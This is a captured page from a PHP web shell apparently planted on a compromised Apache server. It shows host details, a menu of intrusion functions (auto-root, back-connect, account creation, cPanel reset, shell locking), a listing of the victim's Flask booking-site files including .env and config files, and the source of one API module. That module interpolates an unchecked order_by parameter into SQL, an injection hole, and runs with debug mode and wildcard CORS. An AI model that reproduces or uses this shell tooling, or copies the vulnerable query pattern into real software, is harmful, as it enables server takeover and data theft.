Linux 45-56-67-123 5.14.0-503.16.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Dec 13 01:47:05 EST 2024 x86_64
Apache/2.4.62 (AlmaLinux) OpenSSL/3.2.2
: 45.56.67.123 | : 52.14.131.93
Cant Read [ /etc/named.conf ]
8.3.15
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
afra /
py-maracar.afaa.website /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
email-template
[ DIR ]
drwxr-xr-x
logs
[ DIR ]
drwxr-xr-x
venv
[ DIR ]
drwxr-xr-x
.env
380
B
-rwxr-xr-x
.htaccess
459
B
-rwxr-xr-x
Booking.py
10.46
KB
-rwxr-xr-x
Booking_env_3.py
12.6
KB
-rwxr-xr-x
api_env_2_routes.py
2.92
KB
-rwxr-xr-x
api_env_3_routes.py
9.31
KB
-rwxr-xr-x
booking_delete.py
2.6
KB
-rwxr-xr-x
booking_delete_env_3.py
2.65
KB
-rwxr-xr-x
bookingdetail.py
16.94
KB
-rwxr-xr-x
bookingdetail_env_3.py
23.36
KB
-rwxr-xr-x
branch_env_3.py
6.16
KB
-rwxr-xr-x
change_password.py
2.09
KB
-rwxr-xr-x
check.py
4.36
KB
-rwxr-xr-x
check_env_2.py
3.82
KB
-rwxr-xr-x
check_env_3.py
3.82
KB
-rwxr-xr-x
check_tel.py
4.37
KB
-rwxr-xr-x
checkout.py
2.01
KB
-rwxr-xr-x
config.py
547
B
-rwxr-xr-x
connec_data.py
2.18
KB
-rwxr-xr-x
createkeysecret.py
304
B
-rwxr-xr-x
database.py
1.49
KB
-rwxr-xr-x
decorator.py
3.57
KB
-rwxr-xr-x
forgot.py
2.34
KB
-rwxr-xr-x
gen_uuid.py
4.17
KB
-rwxr-xr-x
image_conn_data.py
1.79
KB
-rwxr-xr-x
image_conn_data3.py
2.02
KB
-rwxr-xr-x
image_urls.py
7.49
KB
-rwxr-xr-x
image_urls_env_3.py
7.71
KB
-rwxr-xr-x
index.html
7.81
KB
-rwxr-xr-x
jangwat_thai.py
8.06
KB
-rwxr-xr-x
maracar.py
14.46
KB
-rwxr-xr-x
maracar.wsgi
379
B
-rwxr-xr-x
maracar_test.py
114
B
-rwxr-xr-x
matching_user_env_2.py
13.19
KB
-rwxr-xr-x
order_send_email_env_3.py
6.6
KB
-rwxr-xr-x
order_send_email_smtpgo.py
7.85
KB
-rw-r--r--
payments.py
9.07
KB
-rwxr-xr-x
payments_env_3.py
12.6
KB
-rwxr-xr-x
payments_payzen.py
14.1
KB
-rwxr-xr-x
payments_test_env_3.py
4.62
KB
-rwxr-xr-x
plot_cpu_usage.py
1.42
KB
-rwxr-xr-x
position_set.py
1.51
KB
-rwxr-xr-x
positions_list.py
987
B
-rwxr-xr-x
price_create.py
13.63
KB
-rwxr-xr-x
price_create3.py
21.56
KB
-rwxr-xr-x
promotion_items.py
4.9
KB
-rwxr-xr-x
promotions.py
8.44
KB
-rwxr-xr-x
queues.py
8.58
KB
-rwxr-xr-x
queues_env_3.py
11.28
KB
-rwxr-xr-x
register.py
5.11
KB
-rwxr-xr-x
register_edit.py
3
KB
-rwxr-xr-x
register_edit_env_2.py
3.14
KB
-rwxr-xr-x
register_edit_env_3.py
3.71
KB
-rwxr-xr-x
register_env_2.py
5.19
KB
-rwxr-xr-x
register_env_3.py
4.44
KB
-rwxr-xr-x
report_bookingoverview.py
9.86
KB
-rwxr-xr-x
report_bookingoverview_env_3.p...
12.93
KB
-rwxr-xr-x
requirements.txt
457
B
-rwxr-xr-x
reviews.py
9.42
KB
-rwxr-xr-x
reviews_env_3.py
12.91
KB
-rwxr-xr-x
service.py
5.87
KB
-rwxr-xr-x
service3.py
7.87
KB
-rwxr-xr-x
sms_octopush.py
1.71
KB
-rwxr-xr-x
sms_thsms3.py
2.09
KB
-rwxr-xr-x
specificinsert_env_2.py
3.63
KB
-rwxr-xr-x
status_list.py
960
B
-rwxr-xr-x
types_create.py
4.6
KB
-rwxr-xr-x
types_create3.py
8.91
KB
-rwxr-xr-x
update_status.py
2.52
KB
-rwxr-xr-x
user.py
4.02
KB
-rwxr-xr-x
user3.py
4.78
KB
-rwxr-xr-x
user_all.py
3.88
KB
-rwxr-xr-x
user_all_env_2.py
5.81
KB
-rwxr-xr-x
user_all_env_3.py
8.44
KB
-rwxr-xr-x
user_all_mlm.py
9.18
KB
-rwxr-xr-x
user_all_mlm_env_2.py
9.26
KB
-rwxr-xr-x
user_env_2.py
4.1
KB
-rwxr-xr-x
user_mlm.py
10.47
KB
-rwxr-xr-x
user_mlm_env_2.py
10.49
KB
-rwxr-xr-x
user_mlm_env_3.py
18.45
KB
-rw-r--r--
user_routes.py
1.28
KB
-rwxr-xr-x
website1.env
12
B
-rwxr-xr-x
website2.env
12
B
-rwxr-xr-x
website3.env
12
B
-rwxr-xr-x
website4.env
12
B
-rwxr-xr-x
website5.env
12
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : user_all_mlm_env_2.py
#/var/www/website2024/py-maracar.afaa.website/user_all_mlm_env_2.py # python3 user_all_mlm_env_2.py from flask import Flask, request, jsonify, make_response from flask_cors import CORS import mysql.connector import threading import time from datetime import timedelta import logging from logging.handlers import RotatingFileHandler import os from functools import wraps import jwt from dotenv import load_dotenv from decorator import token_required from config import SECRET_KEY, DATABASE_HOST, DATABASE_USER, DATABASE_PASSWORD, DATABASE_NAME import re # Load the specific .env file directly load_dotenv('/var/www/website2024/py-maracar.afaa.website/.env') app = Flask(__name__) CORS(app, resources={r"/*": {"origins": "*"}}) app.config['SECRET_KEY'] = SECRET_KEY # Setup logging log_dir = '/var/log/python' if not os.path.exists(log_dir): os.makedirs(log_dir) file_handler = RotatingFileHandler(os.path.join(log_dir, 'flask_app.log'), maxBytes=100000, backupCount=10) file_handler.setFormatter(logging.Formatter('%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]')) file_handler.setLevel(logging.INFO) app.logger.addHandler(file_handler) app.logger.setLevel(logging.INFO) def get_website_id(): return os.getenv('WEBSITE_ID2') # Function to sanitize input by removing unwanted characters def sanitize_input(value): if value is not None: # Remove non-printable characters and unwanted unicode characters value = re.sub(r'[^\x20-\x7E]', '', value) return value # Function to fetch user and team details from the database def fetch_all_users_mlm(user_id=None, position_id=None, status_id=None, first_name=None, sur_name=None, telephone=None, email=None, user_ID_for=None, limit=None, offset=None, order_by='u.user_ID', order_dir='ASC'): conn = mysql.connector.connect( host=DATABASE_HOST, user=DATABASE_USER, password=DATABASE_PASSWORD, database=DATABASE_NAME ) cursor = conn.cursor(dictionary=True) query = ''' SELECT u.user_ID, u.first_name, u.sur_name, u.telephone, u.email, u.contact, u.image, u.status_ID, u.position_ID, u.date, u.time, u.ip, u.birthday, u.social_media, u.thamboonID, u.amphoeID, u.jangwatID, ut.user_team_id, ut.sponsor_id, ut.team_id, ut.effective_date, ut.position_ID AS user_team_position_ID, ut.commission_rate, ut.entry_order, ut.join_date, s.first_name AS sponsor_first_name, s.sur_name AS sponsor_sur_name FROM user u INNER JOIN user_team ut ON u.user_ID = ut.user_id LEFT JOIN user s ON ut.sponsor_id = s.user_ID WHERE u.websiteID = %s ''' query_params = [get_website_id()] if position_id: query += ' AND u.position_ID = %s' query_params.append(position_id) if status_id: query += ' AND u.status_ID = %s' query_params.append(status_id) if first_name: query += ' AND u.first_name LIKE %s' query_params.append(f"%{first_name}%") if sur_name: query += ' AND u.sur_name LIKE %s' query_params.append(f"%{sur_name}%") if telephone: telephone = sanitize_input(telephone) query += ' AND u.telephone LIKE %s' query_params.append(f"%{telephone}%") if email: query += ' AND u.email LIKE %s' query_params.append(f"%{email}%") if user_ID_for: user_ID_for = sanitize_input(user_ID_for) query += ' AND u.user_ID LIKE %s' query_params.append(f"%{user_ID_for}%") query += f' ORDER BY {order_by} {order_dir}' if limit is not None and offset is not None: query += ' LIMIT %s OFFSET %s' query_params.extend([limit, offset]) # Print the query and its parameters #print("Executing query:", query) #print("With parameters:", query_params) cursor.execute(query, query_params) users_data = cursor.fetchall() processed_users_data = [] for user in users_data: processed_user = {k: str(v) if isinstance(v, timedelta) else v for k, v in user.items()} processed_users_data.append(processed_user) cursor.close() conn.close() return processed_users_data # Function to fetch total count of users matching the criteria def fetch_total_users_count(user_id=None, position_id=None, status_id=None, first_name=None, sur_name=None, telephone=None, email=None, user_ID_for=None): conn = mysql.connector.connect( host=DATABASE_HOST, user=DATABASE_USER, password=DATABASE_PASSWORD, database=DATABASE_NAME ) cursor = conn.cursor(dictionary=True) count_query = ''' SELECT COUNT(*) as total_count FROM user u INNER JOIN user_team ut ON u.user_ID = ut.user_id LEFT JOIN user s ON ut.sponsor_id = s.user_ID WHERE u.websiteID = %s ''' count_query_params = [get_website_id()] if position_id: count_query += ' AND u.position_ID = %s' count_query_params.append(position_id) if status_id: count_query += ' AND u.status_ID = %s' count_query_params.append(status_id) if first_name: count_query += ' AND u.first_name LIKE %s' count_query_params.append(f"%{first_name}%") if sur_name: count_query += ' AND u.sur_name LIKE %s' count_query_params.append(f"%{sur_name}%") if telephone: count_query += ' AND u.telephone LIKE %s' count_query_params.append(f"%{telephone}%") if email: count_query += ' AND u.email LIKE %s' count_query_params.append(f"%{email}%") if user_ID_for: user_ID_for = sanitize_input(user_ID_for) count_query += ' AND u.user_ID LIKE %s' count_query_params.append(f"%{user_ID_for}%") # Print the query and its parameters #print("Executing count query:", count_query) #print("With parameters:", count_query_params) cursor.execute(count_query, count_query_params) total_count = cursor.fetchone()['total_count'] cursor.close() conn.close() return total_count @app.route('/register/api_env_2/all_users_mlm', methods=['GET']) @token_required def all_users_mlm_env_2(): try: user_id = request.args.get('user_ID') position_id = request.args.get('position_ID') status_id = request.args.get('status_ID') limit = request.args.get('limit', type=int) offset = request.args.get('offset', type=int) order_by = request.args.get('order_by', default='u.user_ID') order_dir = request.args.get('order_dir', default='ASC') # Validate order direction if order_dir not in ['ASC', 'DESC']: return jsonify({'message': 'Invalid order direction. Use "ASC" or "DESC".'}), 400 app.logger.info(f"Received request with params: user_id={user_id}, position_id={position_id}, status_id={status_id}, limit={limit}, offset={offset}, order_by={order_by}, order_dir={order_dir}") total_users_count = fetch_total_users_count(user_id, position_id, status_id) users_data = fetch_all_users_mlm(user_id, position_id, status_id, limit=limit, offset=offset, order_by=order_by, order_dir=order_dir) response_data = { 'total_count': total_users_count, 'displayed_count': len(users_data), 'users': users_data } return jsonify(response_data), 200 except Exception as e: app.logger.error(f"Error occurred: {e}") return jsonify({'message': 'Internal Server Error'}), 500 @app.route('/register/api_env_2/all_users_mlm_search', methods=['GET', 'POST', 'PUT']) @token_required def all_users_mlm_search_env_2(): user_id = request.args.get('user_ID') position_id = request.args.get('position_ID') status_id = request.args.get('status_ID') first_name = request.args.get('first_name') sur_name = request.args.get('sur_name') telephone = request.args.get('telephone') email = request.args.get('email') user_ID_for = request.args.get('user_ID_for') limit = request.args.get('limit', type=int) offset = request.args.get('offset', type=int) order_by = request.args.get('order_by', default='u.user_ID') order_dir = request.args.get('order_dir', default='ASC') # Validate order direction if order_dir not in ['ASC', 'DESC']: return jsonify({'message': 'Invalid order direction. Use "ASC" or "DESC".'}), 400 total_users_count = fetch_total_users_count(user_id, position_id, status_id, first_name, sur_name, telephone, email, user_ID_for) users_data = fetch_all_users_mlm(user_id, position_id, status_id, first_name, sur_name, telephone, email, user_ID_for, limit, offset, order_by, order_dir) response_data = { 'total_count': total_users_count, 'displayed_count': len(users_data), 'users': users_data } response = make_response(jsonify(response_data), 200) response.headers.add('Access-Control-Allow-Origin', '*') response.headers.add('Access-Control-Allow-Headers', 'Content-Type,Authorization') response.headers.add('Access-Control-Allow-Methods', 'GET,PUT,POST,DELETE,OPTIONS') return response if __name__ == '__main__': app.run(debug=True, host='0.0.0.0', port=423)
Close
